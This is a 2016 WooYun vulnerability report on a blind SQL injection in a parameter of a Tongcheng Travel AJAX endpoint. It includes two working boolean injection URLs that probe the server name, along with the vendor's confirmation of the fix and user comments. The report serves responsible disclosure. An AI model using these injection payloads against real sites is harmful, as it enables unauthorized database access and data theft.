当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0185861

漏洞标题:苏州同程某站SQL注入一枚

相关厂商:苏州同程旅游网络科技有限公司

漏洞作者: 路人甲

提交时间:2016-03-17 20:57

修复时间:2016-03-18 16:23

公开时间:2016-03-18 16:23

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-17: 细节已通知厂商并且等待厂商处理中
2016-03-18: 厂商已经确认,细节仅向厂商公开
2016-03-18: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

Tangscan的插件666,waf不是万能的,没有waf又万万不能。

详细说明:

tangsacan.jpg


 WooYun: 神器而已之苏州同程旅游SQL注入漏洞 
难道这个漏洞,你以为加上waf就没用了吗?我没玩过mssql。
所以你还是老老实实从源头修起吧。


返回正确
go.ly.com/ajax/GetNewRaiderInfo?type=1&desItemId=&desItemKind=&travelway='邮轮') and left(@@SERVERNAME,1)='t' and ('x'='x'&pageSize=12&pageindex=1&viewtype=1&iid=0.9737567349802703


true.png


返回错误
go.ly.com/ajax/GetNewRaiderInfo?type=1&desItemId=&desItemKind=&travelway='邮轮') and left(@@SERVERNAME,1)='x' and ('x'='x'&pageSize=12&pageindex=1&viewtype=1&iid=0.9737567349802703


false.png

漏洞证明:

修复方案:

源头修起、

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-03-18 10:53

厂商回复:

同一个参数又被报,打脸啊,开发传错机器了...是有从代码层面修来着
∠( ᐛ 」∠)_

最新状态:

2016-03-18:感谢关注同程旅游

漏洞评价:

评价

  1. 2016-03-17 21:20 | whynot ( 普通白帽子 | Rank:594 漏洞数:113 | 为你解冻冰河 为你放弃世界有何不可)

    666

  2. 2016-03-17 21:53 | 小川 认证白帽子 ( 核心白帽子 | Rank:1561 漏洞数:234 | 一个致力要将乌云变成搞笑论坛的男人)

    what?

  3. 2016-03-18 10:56 | hear7v ( 实习白帽子 | Rank:43 漏洞数:9 | 咳咳,kkcpp)

    qiugongkai

  4. 2016-03-18 12:45 | 冰杰 ( 实习白帽子 | Rank:53 漏洞数:6 | 彩笔是我...)

    @苏州同程旅游网络科技有限公司 小吴同志又被打脸了